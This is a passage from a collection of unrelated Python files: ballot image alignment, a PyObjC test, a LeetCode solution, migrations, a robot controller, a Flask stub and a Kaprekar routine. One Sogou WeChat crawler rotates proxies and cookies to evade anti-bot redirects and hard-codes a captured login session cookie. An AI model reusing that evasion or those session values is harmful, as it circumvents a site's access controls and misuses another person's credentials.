    is unbound when no jpg exists - compare with the __main__ variant below,
    which extracts targets for every file. Confirm the intent.
    """
    Iref=misc.imread(IrefP,flatten=1)/255.;
    for root,dirs,files in os.walk(ballotD):
        for f1 in files:
            if not(f1.endswith('jpg')):
                continue
            # 1. check if ballot is flipped
            I=misc.imread(os.path.join(root,f1),flatten=1)/255.0;
            rszFac=.25
            # rotate image
            IR=ndimage.interpolation.rotate(I,180)
            # align both orientations; the smaller alignment error wins
            (H,Io,err)=imagesAlign(I,Iref,rszFac=rszFac,verbose=False)
            (HR,IoR,errR)=imagesAlign(IR,Iref,rszFac=rszFac,verbose=False)
            if err>errR:
                #print f1,' is rotated. diff = ', np.abs(err-errR);
                Iin=IR
            else:
                #print f1,' is NOT rotated. diff = ', np.abs(err-errR);
                Iin=I
        #imshow(STACK,cmap='gray');
        #savefig(os.path.join(root,f1+'.pdf'))
    return extractTargets(Iin,Iref,csvP)
# CLI entry point (Python 2): extract targets for EVERY ballot jpg and save a
# stacked visualization PDF next to each one.
# Usage: python pressGo.py targets.csv blank.jpg ballotD
if __name__ == "__main__":
    if len(sys.argv) != 4:
        print 'Bad input. Example: python pressGo.py targets.csv blank.jpg ballotD'
        sys.exit()
    csvP=sys.argv[1]
    IrefP=sys.argv[2]
    ballotD=sys.argv[3]
    Iref=misc.imread(IrefP,flatten=1)/255.;
    for root,dirs,files in os.walk(ballotD):
        for f1 in files:
            if not(f1.endswith('jpg')):
                continue
            # 1. check if ballot is flipped
            I=misc.imread(os.path.join(root,f1),flatten=1)/255.0;
            rszFac=.25
            # rotate image
            IR=ndimage.interpolation.rotate(I,180)
            # align both orientations; the smaller alignment error wins
            (H,Io,err)=imagesAlign(I,Iref,rszFac=rszFac,verbose=False)
            (HR,IoR,errR)=imagesAlign(IR,Iref,rszFac=rszFac,verbose=False)
            if err>errR:
                print f1,' is rotated. diff = ', np.abs(err-errR);
                Iin=IR
            else:
                print f1,' is NOT rotated. diff = ', np.abs(err-errR);
                Iin=I
            STACK=extractTargets(Iin,Iref,csvP)
            # NOTE(review): imshow/savefig presumably come from pylab via a
            # star import (shared/imagesAlign) - confirm they are in scope.
            imshow(STACK,cmap='gray');
            savefig(os.path.join(root,f1+'.pdf'))
|
import Security
from PyObjCTools.TestSupport import TestCase
class Testoidsalg(TestCase):
    """Check that the legacy CDSA/CSSM OID constants are NOT exposed by the
    Security bindings (the CSSM API is deprecated and deliberately unwrapped).
    """

    def test_unsuppported(self):  # (sic) name kept: renaming changes test IDs
        # BUGFIX: several names below previously had C-comment residue fused
        # into the attribute string (e.g. "CSSMOID_DSA // BSAFE only"), so
        # hasattr() trivially returned False without testing the real symbol.
        # The residue is now kept as ordinary comments instead.
        self.assertFalse(hasattr(Security, "CSSMOID_MD2"))
        self.assertFalse(hasattr(Security, "CSSMOID_MD4"))
        self.assertFalse(hasattr(Security, "CSSMOID_MD5"))
        self.assertFalse(hasattr(Security, "CSSMOID_RSA"))
        self.assertFalse(hasattr(Security, "CSSMOID_MD2WithRSA"))
        self.assertFalse(hasattr(Security, "CSSMOID_MD4WithRSA"))
        self.assertFalse(hasattr(Security, "CSSMOID_MD5WithRSA"))
        self.assertFalse(hasattr(Security, "CSSMOID_SHA1WithRSA"))
        self.assertFalse(hasattr(Security, "CSSMOID_SHA224WithRSA"))
        self.assertFalse(hasattr(Security, "CSSMOID_SHA256WithRSA"))
        self.assertFalse(hasattr(Security, "CSSMOID_SHA384WithRSA"))
        self.assertFalse(hasattr(Security, "CSSMOID_SHA512WithRSA"))
        self.assertFalse(hasattr(Security, "CSSMOID_SHA1WithRSA_OIW"))
        self.assertFalse(hasattr(Security, "CSSMOID_RSAWithOAEP"))
        self.assertFalse(hasattr(Security, "CSSMOID_OAEP_MGF1"))
        self.assertFalse(hasattr(Security, "CSSMOID_OAEP_ID_PSPECIFIED"))
        self.assertFalse(hasattr(Security, "CSSMOID_DES_CBC"))
        self.assertFalse(hasattr(Security, "CSSMOID_ANSI_DH_PUB_NUMBER"))
        self.assertFalse(hasattr(Security, "CSSMOID_ANSI_DH_STATIC"))
        self.assertFalse(hasattr(Security, "CSSMOID_ANSI_DH_ONE_FLOW"))
        self.assertFalse(hasattr(Security, "CSSMOID_ANSI_DH_EPHEM"))
        self.assertFalse(hasattr(Security, "CSSMOID_ANSI_DH_HYBRID1"))
        self.assertFalse(hasattr(Security, "CSSMOID_ANSI_DH_HYBRID2"))
        self.assertFalse(hasattr(Security, "CSSMOID_ANSI_DH_HYBRID_ONEFLOW"))
        self.assertFalse(hasattr(Security, "CSSMOID_ANSI_MQV1"))
        self.assertFalse(hasattr(Security, "CSSMOID_ANSI_MQV2"))
        self.assertFalse(hasattr(Security, "CSSMOID_ANSI_DH_STATIC_SHA1"))
        self.assertFalse(hasattr(Security, "CSSMOID_ANSI_DH_ONE_FLOW_SHA1"))
        self.assertFalse(hasattr(Security, "CSSMOID_ANSI_DH_EPHEM_SHA1"))
        self.assertFalse(hasattr(Security, "CSSMOID_ANSI_DH_HYBRID1_SHA1"))
        self.assertFalse(hasattr(Security, "CSSMOID_ANSI_DH_HYBRID2_SHA1"))
        self.assertFalse(hasattr(Security, "CSSMOID_ANSI_MQV1_SHA1"))
        self.assertFalse(hasattr(Security, "CSSMOID_ANSI_MQV2_SHA1"))
        self.assertFalse(hasattr(Security, "CSSMOID_PKCS3"))
        self.assertFalse(hasattr(Security, "CSSMOID_DH"))
        self.assertFalse(hasattr(Security, "CSSMOID_DSA"))  # BSAFE only
        self.assertFalse(hasattr(Security, "CSSMOID_DSA_CMS"))  # X509/CMS
        self.assertFalse(hasattr(Security, "CSSMOID_DSA_JDK"))  # JDK 1.1
        self.assertFalse(hasattr(Security, "CSSMOID_SHA1WithDSA"))  # BSAFE
        self.assertFalse(hasattr(Security, "CSSMOID_SHA1WithDSA_CMS"))  # X509/CMS
        self.assertFalse(hasattr(Security, "CSSMOID_SHA1WithDSA_JDK"))  # JDK 1.1
        self.assertFalse(hasattr(Security, "CSSMOID_SHA1"))
        self.assertFalse(hasattr(Security, "CSSMOID_SHA224"))
        self.assertFalse(hasattr(Security, "CSSMOID_SHA256"))
        self.assertFalse(hasattr(Security, "CSSMOID_SHA384"))
        self.assertFalse(hasattr(Security, "CSSMOID_SHA512"))
        self.assertFalse(hasattr(Security, "CSSMOID_ecPublicKey"))
        self.assertFalse(hasattr(Security, "CSSMOID_ECDSA_WithSHA1"))
        self.assertFalse(hasattr(Security, "CSSMOID_ECDSA_WithSHA224"))
        self.assertFalse(hasattr(Security, "CSSMOID_ECDSA_WithSHA256"))
        self.assertFalse(hasattr(Security, "CSSMOID_ECDSA_WithSHA384"))
        self.assertFalse(hasattr(Security, "CSSMOID_ECDSA_WithSHA512"))
        self.assertFalse(hasattr(Security, "CSSMOID_ECDSA_WithSpecified"))
        self.assertFalse(hasattr(Security, "CSSMOID_APPLE_ISIGN"))
        self.assertFalse(hasattr(Security, "CSSMOID_APPLE_X509_BASIC"))
        self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_SSL"))
        self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_LOCAL_CERT_GEN"))
        self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_CSR_GEN"))
        self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_REVOCATION_CRL"))
        self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_REVOCATION_OCSP"))
        self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_SMIME"))
        self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_EAP"))
        self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_CODE_SIGN"))
        self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_SW_UPDATE_SIGNING"))
        self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_IP_SEC"))
        self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_ICHAT"))
        self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_RESOURCE_SIGN"))
        self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_PKINIT_CLIENT"))
        self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_PKINIT_SERVER"))
        self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_CODE_SIGNING"))
        self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_PACKAGE_SIGNING"))
        self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_MACAPPSTORE_RECEIPT"))
        self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_APPLEID_SHARING"))
        self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_TIMESTAMPING"))
        self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_REVOCATION"))
        self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_PASSBOOK_SIGNING"))
        self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_MOBILE_STORE"))
        self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_ESCROW_SERVICE"))
        self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_PROFILE_SIGNING"))
        self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_QA_PROFILE_SIGNING"))
        self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_TEST_MOBILE_STORE"))
        self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_PCS_ESCROW_SERVICE"))
        self.assertFalse(
            hasattr(Security, "CSSMOID_APPLE_TP_PROVISIONING_PROFILE_SIGNING")
        )
        self.assertFalse(hasattr(Security, "CSSMOID_APPLE_FEE"))
        self.assertFalse(hasattr(Security, "CSSMOID_APPLE_ASC"))
        self.assertFalse(hasattr(Security, "CSSMOID_APPLE_FEE_MD5"))
        self.assertFalse(hasattr(Security, "CSSMOID_APPLE_FEE_SHA1"))
        self.assertFalse(hasattr(Security, "CSSMOID_APPLE_FEED"))
        self.assertFalse(hasattr(Security, "CSSMOID_APPLE_FEEDEXP"))
        self.assertFalse(hasattr(Security, "CSSMOID_APPLE_ECDSA"))
        self.assertFalse(hasattr(Security, "CSSMOID_DOTMAC_CERT"))
        self.assertFalse(hasattr(Security, "CSSMOID_DOTMAC_CERT_REQ"))
        self.assertFalse(hasattr(Security, "CSSMOID_DOTMAC_CERT_REQ_IDENTITY"))
        self.assertFalse(hasattr(Security, "CSSMOID_DOTMAC_CERT_REQ_EMAIL_SIGN"))
        self.assertFalse(hasattr(Security, "CSSMOID_DOTMAC_CERT_REQ_EMAIL_ENCRYPT"))
        self.assertFalse(hasattr(Security, "CSSMOID_DOTMAC_CERT_REQ_ARCHIVE_LIST"))
        self.assertFalse(hasattr(Security, "CSSMOID_DOTMAC_CERT_REQ_ARCHIVE_STORE"))
        self.assertFalse(hasattr(Security, "CSSMOID_DOTMAC_CERT_REQ_ARCHIVE_FETCH"))
        self.assertFalse(hasattr(Security, "CSSMOID_DOTMAC_CERT_REQ_ARCHIVE_REMOVE"))
        self.assertFalse(hasattr(Security, "CSSMOID_DOTMAC_CERT_REQ_SHARED_SERVICES"))
        self.assertFalse(hasattr(Security, "CSSMOID_DOTMAC_CERT_REQ_VALUE_USERNAME"))
        self.assertFalse(hasattr(Security, "CSSMOID_DOTMAC_CERT_REQ_VALUE_PASSWORD"))
        self.assertFalse(hasattr(Security, "CSSMOID_DOTMAC_CERT_REQ_VALUE_HOSTNAME"))
        self.assertFalse(hasattr(Security, "CSSMOID_DOTMAC_CERT_REQ_VALUE_RENEW"))
        self.assertFalse(hasattr(Security, "CSSMOID_DOTMAC_CERT_REQ_VALUE_ASYNC"))
        self.assertFalse(hasattr(Security, "CSSMOID_DOTMAC_CERT_REQ_VALUE_IS_PENDING"))
        self.assertFalse(hasattr(Security, "CSSMOID_PKCS5_DIGEST_ALG"))
        self.assertFalse(hasattr(Security, "CSSMOID_PKCS5_ENCRYPT_ALG"))
        self.assertFalse(hasattr(Security, "CSSMOID_PKCS5_HMAC_SHA1"))
        self.assertFalse(hasattr(Security, "CSSMOID_PKCS5_pbeWithMD2AndDES"))
        self.assertFalse(hasattr(Security, "CSSMOID_PKCS5_pbeWithMD2AndRC2"))
        self.assertFalse(hasattr(Security, "CSSMOID_PKCS5_pbeWithMD5AndDES"))
        self.assertFalse(hasattr(Security, "CSSMOID_PKCS5_pbeWithMD5AndRC2"))
        self.assertFalse(hasattr(Security, "CSSMOID_PKCS5_pbeWithSHA1AndDES"))
        self.assertFalse(hasattr(Security, "CSSMOID_PKCS5_pbeWithSHA1AndRC2"))
        self.assertFalse(hasattr(Security, "CSSMOID_PKCS5_PBKDF2"))
        self.assertFalse(hasattr(Security, "CSSMOID_PKCS5_PBES2"))
        self.assertFalse(hasattr(Security, "CSSMOID_PKCS5_PBMAC1"))
        self.assertFalse(hasattr(Security, "CSSMOID_PKCS5_RC2_CBC"))
        self.assertFalse(hasattr(Security, "CSSMOID_PKCS5_DES_EDE3_CBC"))
        self.assertFalse(hasattr(Security, "CSSMOID_PKCS5_RC5_CBC"))
        self.assertFalse(hasattr(Security, "CSSMOID_PKCS12_pbeWithSHAAnd128BitRC4"))
        self.assertFalse(hasattr(Security, "CSSMOID_PKCS12_pbeWithSHAAnd40BitRC4"))
        self.assertFalse(hasattr(Security, "CSSMOID_PKCS12_pbeWithSHAAnd3Key3DESCBC"))
        self.assertFalse(hasattr(Security, "CSSMOID_PKCS12_pbeWithSHAAnd2Key3DESCBC"))
        self.assertFalse(hasattr(Security, "CSSMOID_PKCS12_pbeWithSHAAnd128BitRC2CBC"))
        self.assertFalse(hasattr(Security, "CSSMOID_PKCS12_pbewithSHAAnd40BitRC2CBC"))
|
'''
5248->1248. Count Number of Nice Subarrays
Difficulty: Medium
Given an array of integers nums and an integer k.
A subarray is called nice if there are k odd numbers on it.
Return the number of nice sub-arrays.
Example 1:
Input: nums = [1,1,2,1,1], k = 3
Output: 2
Explanation: The only sub-arrays with 3 odd numbers are [1,1,2,1] and [1,2,1,1].
Example 2:
Input: nums = [2,4,6], k = 1
Output: 0
Explanation: There is no odd numbers in the array.
Example 3:
Input: nums = [2,2,2,1,2,2,1,2,2,2], k = 2
Output: 16
Constraints:
1 <= nums.length <= 50000
1 <= nums[i] <= 10^5
1 <= k <= nums.length
'''
class Solution(object):
    def numberOfSubarrays(self, nums, k):
        """
        Count subarrays of nums containing exactly k odd numbers.

        Prefix technique: let odd(i) be the number of odd values in
        nums[:i]. A subarray (j, i] is "nice" iff odd(i) - odd(j) == k,
        so for each prefix we add how many earlier prefixes had
        odd-count (current - k). O(n) time, O(n) space.

        :type nums: List[int]
        :type k: int
        :rtype: int
        """
        prefix_counts = {0: 1}  # empty prefix has zero odd numbers
        odd_so_far = 0
        nice = 0
        for value in nums:
            odd_so_far += value & 1  # parity test; 1 for odd, 0 for even
            nice += prefix_counts.get(odd_so_far - k, 0)
            prefix_counts[odd_so_far] = prefix_counts.get(odd_so_far, 0) + 1
        return nice
|
# Generated by Django 3.2 on 2021-05-26 17:20
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: rename LeaveReportStudent.leave_date to
    leave_start_date and add a leave_end_date column.

    NOTE(review): dates are stored as CharField here - presumably matching
    leave_start_date's existing type; confirm before changing to DateField.
    Generated files should not be edited by hand after being applied.
    """
    dependencies = [
        ('school_management_app', '0024_pcomment_pnews'),
    ]
    operations = [
        migrations.RenameField(
            model_name='leavereportstudent',
            old_name='leave_date',
            new_name='leave_start_date',
        ),
        migrations.AddField(
            model_name='leavereportstudent',
            name='leave_end_date',
            field=models.CharField(default='', max_length=255),
        ),
    ]
|
from aurigapy import *
from time import sleep
from time import gmtime, strftime
# Base wheel speed for straight running and the slower speed used in turns.
BASE_SPEED = 40
BASE_TURN = 30
ap = AurigaPy(debug=False)
# Serial device the robot's Bluetooth link is bound to.
bluetooth = "/dev/rfcomm1"
ap.connect(bluetooth)
print("Conectado")
# Last motion command issued ("fwds"/"bwds"/"left"/"rite");
# 'f' is a start-up placeholder meaning "no command sent yet".
lastSpeedo = 'f'
def custom_speeds(robot, speed_L, speed_R):
    """Send one raw motor command setting each wheel speed independently,
    then block until the robot acknowledges it.

    robot   -- connected AurigaPy instance
    speed_L -- left wheel speed (signed; negative reverses)
    speed_R -- right wheel speed (signed; negative reverses)
    """
    # Need to concatenate the hex sequence ff 55 07 00 02 05 <speedleft> <speedright> to the bot's output
    # Since the line follower direction control requires of custom speeds for each wheel, it's convenient to directly call
    # the _write method with a customized string
    # Minor changes to the usual callback generation
    rp = Response.generate_response_block(Frame.FRAME_TYPE_ACK, timeout=2)
    robot.add_responder(rp)
    # Generate hex string based on speeds
    data = bytearray([0xff, 0x55, 0x07, 0x00, 0x02, 0x5] +
                     short2bytes(speed_L) +
                     short2bytes(speed_R))
    # Write the hex string directly to the bot
    robot._write(data)
    # Wait for callback
    rp.wait_blocking()
# Wheel-speed lookup: RESPONSES[sensor_value][previous_state] -> (left, right).
# The start-up state 'f' is deliberately absent, so the very first reading
# only updates the state without issuing a motor command.
RESPONSES = {
    # sensor 0: both detectors on the line - keep going forwards
    0: {"fwds": (-BASE_SPEED, BASE_SPEED),
        "bwds": (BASE_SPEED, -BASE_SPEED),
        # slight asymmetry re-adjusts the heading without over-compensating
        "left": (-BASE_SPEED, BASE_SPEED + 5),
        "rite": (-BASE_SPEED + 5, BASE_SPEED)},
    # sensor 1: drifting right - steer left
    1: {"fwds": (-BASE_TURN, -BASE_TURN),
        "bwds": (BASE_SPEED, BASE_TURN),
        "left": (-BASE_SPEED, -BASE_TURN),   # pronounced left turn
        "rite": (-BASE_SPEED, -BASE_TURN)},  # sharp "Z" turn
    # sensor 2: drifting left - steer right
    2: {"fwds": (BASE_TURN, BASE_SPEED),
        "bwds": (-BASE_TURN, -BASE_SPEED),
        "left": (BASE_TURN, BASE_SPEED),     # sharp "Z" turn
        "rite": (BASE_TURN, BASE_SPEED)},    # pronounced right turn
}
NEXT_STATE = {0: "fwds", 1: "left", 2: "rite"}
while(True):
    value = ap.get_line_sensor(9)
    if value == 3:
        # Fully off the line: back up to find it again, whatever we did last.
        custom_speeds(ap, BASE_SPEED, -BASE_SPEED)
        lastSpeedo = "bwds"
    elif value in RESPONSES:
        speeds = RESPONSES[value].get(lastSpeedo)
        if speeds is not None:
            custom_speeds(ap, *speeds)
        lastSpeedo = NEXT_STATE[value]
|
import requests
from weixin.config import *
from weixin.db import RedisClient
from pyquery import PyQuery as pq
class Spider():
    """Sogou-WeChat search crawler.

    Pages through Sogou's WeChat article search for a fixed keyword and
    pushes every article URL into a Redis-backed request queue. Proxies
    and SNUID cookies are pulled from RedisClient; VALID_STATUSE comes
    from the star import of weixin.config.
    """
    # %s placeholders are (keyword, page number).
    base_url = 'https://weixin.sogou.com/weixin?query=%s&type=2&page=%s&ie=utf8'
    keyword = '宝多六花'
    # NOTE(review): despite the name, these are HTTP request *headers*.
    params = {
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
        'Accept-Encoding': 'gzip, deflate, br',
        'Accept-Language': 'zh-CN,zh;q=0.9',
        'Cache-Control': 'max-age=0',
        'Connection': 'keep-alive',
        'Host': 'weixin.sogou.com',
        'Upgrade-Insecure-Requests': '1',
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36',
    }
    # Shadowed by the module-level globals the methods declare below.
    proxies = None
    headers = None
    redis = RedisClient()
    def head(self, snuid):
        """
        Build the request headers from a SNUID cookie entry.
        :param snuid: (key, value) pair; only the value part is used
        :return: the headers dict with the Cookie field filled in
        """
        snuid = snuid[1]
        print('Cookie使用:', snuid)
        # NOTE(review): the remainder of the cookie is a hard-coded captured
        # session and will expire - consider generating it dynamically.
        cookie = snuid + 'IPLOC=CN3603; SUID=478DA7275218910A000000005BB4C763; weixinIndexVisited=1; SUV=00151DF127A78D475BB4C764498BA456; JSESSIONID=aaaKzrDDD0iwcf7S_fWyw; SMYUV=1539481497473652; UM_distinctid=166703f6f890-0f89813641ce5e-333b5602-100200-166703f6f8a1a7; PHPSESSID=r6s9gp60p8bonj5nbn9ak42fg4; ld=CZllllllll2berZFlllllVsZLI1lllllJicb$kllll9lllll9klll5@@@@@@@@@@; LSTMV=246%2C75; LCLKINT=6255; ABTEST=0|1542511268|v1; ppinf=5|1542694165|1543903765|dHJ1c3Q6MToxfGNsaWVudGlkOjQ6MjAxN3x1bmlxbmFtZTo2OlV0b3BpYXxjcnQ6MTA6MTU0MjY5NDE2NXxyZWZuaWNrOjY6VXRvcGlhfHVzZXJpZDo0NDpvOXQybHVIUTk5LUFDd3Z1ZEFzSmJtckNhajk0QHdlaXhpbi5zb2h1LmNvbXw; pprdig=Ev03K1qUPEGid38Q2SatAOOTb4h9G4CDCGNIL5qTlajwdP4iFjwtcIqjKuRGNaLYGGokWecSiHeGAXQwWQm25skRiXqu8vRBACj9ejaxcTpV4lHuU_yIl5bs7OTsaaWyBx1wz9SCMPdqrFUKzSGgQN0PJ63IaDT5EQhyyTUKsVQ; sgid=16-37598605-AVvzpRVIQO87TxrZ9rdxtq4; SUIR=4F34C9486E6B15888DA7BE166F6E5369; SNUID=C226DF5F787C025C95C8952C79C3468F; sct=12; ppmdig=1542812932000000dda27b6ad31fee458e068a05ea2a6467'
        self.params['Cookie'] = cookie
        return self.params
    def test_proxy(self):
        """
        Second-pass proxy vetting: pick a random proxy from Redis and keep
        retrying (recursively, scoring failures down) until one returns 200.
        Sets the module-global `proxies` as a side effect.
        """
        global proxies
        global headers
        url = 'https://weixin.sogou.com/weixin?query=宝多六花&type=2&page=1&ie=utf8'
        proxy = self.redis.proxy_random()
        proxies = {
            'http': 'http://' + proxy,
            'https': 'https://' + proxy
        }
        try:
            r = requests.get(url, headers=headers, allow_redirects=False, proxies=proxies)
            if r.status_code == 200:
                pass
            else:
                # Demote the failing proxy and try another one.
                self.redis.proxy_decrease(proxy)
                self.test_proxy()
        except:
            # NOTE(review): bare except also hides non-network errors.
            self.redis.proxy_decrease(proxy)
            self.test_proxy()
    def start(self, page):
        """Fetch one search-result page; on a 302 anti-bot redirect, rotate
        the SNUID cookie and retry once; on errors, re-vet the proxy and
        retry the same page."""
        global headers
        global proxies
        url = self.base_url %(self.keyword, page)
        try:
            response = requests.get(url, headers=headers, proxies=proxies, allow_redirects=False, timeout=20)
            print('正在爬取:', url)
            if response and response.status_code in VALID_STATUSE:
                self.parse_index(response)
            if response.status_code == 302:
                # Redirect means the cookie was flagged - fetch a fresh SNUID.
                headers = self.head(self.redis.snuid_pop())
                response = requests.get(url, headers=headers, proxies=proxies, allow_redirects=False, timeout=5)
                print('重新爬取:', url)
                self.parse_index(response)
        except:
            self.test_proxy()
            self.start(page)
    def parse_index(self, response):
        """
        Parse a search-result (index) page.
        :param response: HTTP response of the index page
        :return: None; article URLs are pushed to the Redis request queue
        """
        doc = pq(response.text)
        items = doc('.news-box .news-list li .txt-box h3 a').items()
        for item in items:
            url = item.attr('href')
            self.redis.request_add(url)
            print('添加url:', url)
    def run(self):
        """
        Entry point: prepare headers and a working proxy, then crawl
        result pages 1-100.
        """
        global headers
        global proxies
        headers = self.head(self.redis.snuid_pop())
        self.test_proxy()
        for i in range(1, 101):
            self.start(i)
            # self.schedule()
if __name__ == '__main__':
    # Script entry point: build a Spider and crawl every index page.
    Spider().run()
|
from flask import Flask
# BUG FIX: the ``flask.ext.*`` import namespace was removed in
# Flask 1.0 — extensions must be imported under their own package name.
from flask_sqlalchemy import SQLAlchemy
import os

# Directory containing this module; the SQLite file lives next to it.
baseDir = os.path.abspath(os.path.dirname(__file__))

app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(baseDir, 'data.sqlite')
# NOTE(review): SQLALCHEMY_COMMIT_ON_TEARDOWN is deprecated (removed in
# recent Flask-SQLAlchemy releases) — kept to preserve the original
# auto-commit behaviour; prefer explicit db.session.commit() per request.
app.config['SQLALCHEMY_COMMIT_ON_TEARDOWN'] = True
db = SQLAlchemy(app)


@app.route('/')
def hello_world():
    """Trivial index route used to verify the app is serving."""
    return 'Hello World!'


if __name__ == '__main__':
    app.run()
|
class Man:
    """Small demo class holding a name and a fixed (x, y) position."""

    def __init__(self, name):
        self.name = name  # display name used by do_stuff()
        self.x = 3
        self.y = 3

    def do_stuff(self):
        """Return a short introduction string."""
        return "What do you expect im " + self.name

    # BUG FIX: the original defined a second ``do_stuff(x)`` here, which
    # silently shadowed the method above; calling instance.do_stuff()
    # then bound the instance to ``x`` and raised TypeError on ``x + 3``.
    # The arithmetic helper now lives under its own name so both
    # behaviours are reachable.
    def add_three(self, x):
        """Return ``x`` plus 3."""
        return x + 3
|
import Pyro4
from accessor import Counter
# NOTE(review): this import shadows accessor.Counter above, so only
# counter.Counter is ever used below — confirm which class is intended
# before removing either import.
from counter import Counter

c = Counter()
# Proxy for the remote object published under this fixed URI.
daemon = Pyro4.Proxy("PYRO:obj_4f9617d564a4482a97ced8ee97da3103@localhost:4040")
# BUG FIX: ``print daemon.register(c)`` is Python 2 statement syntax and
# a SyntaxError on Python 3; use the print() function.
print(daemon.register(c))
"""empty message
Revision ID: 08bd50fb5714
Revises: f9829baa1eec
Create Date: 2019-03-08 21:00:21.413403
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '08bd50fb5714'       # this migration's id
down_revision = 'f9829baa1eec'  # parent migration this one applies on top of
branch_labels = None
depends_on = None
def upgrade():
    """Add the non-nullable ``isActive`` flag to the ``users`` table.

    BUG FIX: a server_default is supplied so the ALTER TABLE succeeds on
    a table that already contains rows — adding a NOT NULL column with
    no default fails there on most backends.
    """
    # ### commands auto generated by Alembic - please adjust! ###
    op.add_column('users',
                  sa.Column('isActive', sa.Boolean(), nullable=False,
                            server_default=sa.false()))
    # ### end Alembic commands ###
def downgrade():
    """Drop the ``isActive`` column from ``users`` (reverse of upgrade)."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.drop_column('users', 'isActive')
    # ### end Alembic commands ###
|
"""Функция Капрекара
Wiki:
https://en.wikipedia.org/wiki/Kaprekar%27s_routine
"""
from typing import Tuple, Union, Generator
def kaprekar_function(number: int) -> Tuple[int, int]:
    """Kaprekar's routine.

    Repeatedly replaces *number* with the difference between the number
    formed by its digits in descending order and the number formed by
    its digits in ascending order, stopping when the value no longer
    changes (a Kaprekar constant is reached) or collapses to 0.

    See: https://en.wikipedia.org/wiki/Kaprekar%27s_routine

    >>> kaprekar_function(876)
    (495, 5)
    >>> kaprekar_function(3412)
    (6174, 3)

    :param number: the starting number (assumed non-negative)
    :type number: int
    :return: a pair ``(x, y)`` where ``x`` is the constant the number
        converges to and ``y`` is the number of steps taken.
    :rtype: Tuple[int, int]
    """
    count = 0
    old_n = 0
    while number != old_n and number > 0:
        old_n = number
        digits = list(str(number))
        increasing_numbers = int(''.join(sorted(digits, reverse=True)))
        decreasing_numbers = int(''.join(sorted(digits)))
        number = increasing_numbers - decreasing_numbers
        count += 1
    # BUG FIX: the original returned ``old_n``, which is wrong when the
    # loop exits via the ``number > 0`` guard (value collapsed to 0):
    # old_n then still holds the value *before* the last step, e.g.
    # kaprekar_function(1) returned (1, 1) instead of (0, 1), making
    # gkaprekar's own doctests fail.  ``number`` is correct in both
    # exit cases (fixed point reached, or collapse to 0).
    return number, count - 1 if count > 1 else count
def gkaprekar(start: int, stop: Union[int, None] = None, /) -> Generator[Tuple[int, Tuple[int, int]], None, None]:
    """Generator over Kaprekar-routine results (see kaprekar_function).

    Mirrors range()'s calling convention: one argument means the
    half-open interval ``[0, start)``, two arguments mean
    ``[start, stop)``.

    >>> list(gkaprekar(5))
    [(0, (0, 0)), (1, (0, 1)), (2, (0, 1)), (3, (0, 1)), (4, (0, 1))]
    >>> list(gkaprekar(10, 15))
    [(10, (0, 1)), (11, (0, 1)), (12, (0, 1)), (13, (0, 5)), (14, (0, 3))]

    :param start: upper bound of ``[0, start)`` when called with one
        argument, otherwise the lower bound of ``[start, stop)``.
    :type start: int
    :param stop: upper bound of ``[start, stop)`` when given.
        BUG FIX: the annotation was ``Union[int]``, which is literally
        just ``int`` and misrepresents the ``None`` default;
        ``Union[int, None]`` (i.e. Optional[int]) is the real contract.
    :type stop: int | None
    :return: pairs ``(i, K(i))`` where ``K(i)`` is the value of
        kaprekar_function(i).
    :rtype: Generator[Tuple[int, Tuple[int, int]], None, None]
    """
    # range()-style argument shuffle: a single argument is the stop.
    if stop is None:
        start, stop = 0, start
    for i in range(start, stop):
        yield i, kaprekar_function(i)
def main():
    """Demo run: print Kaprekar results for the sample range [10, 15)."""
    for index, result in gkaprekar(10, 15):
        print(index, result)


if __name__ == '__main__':
    main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.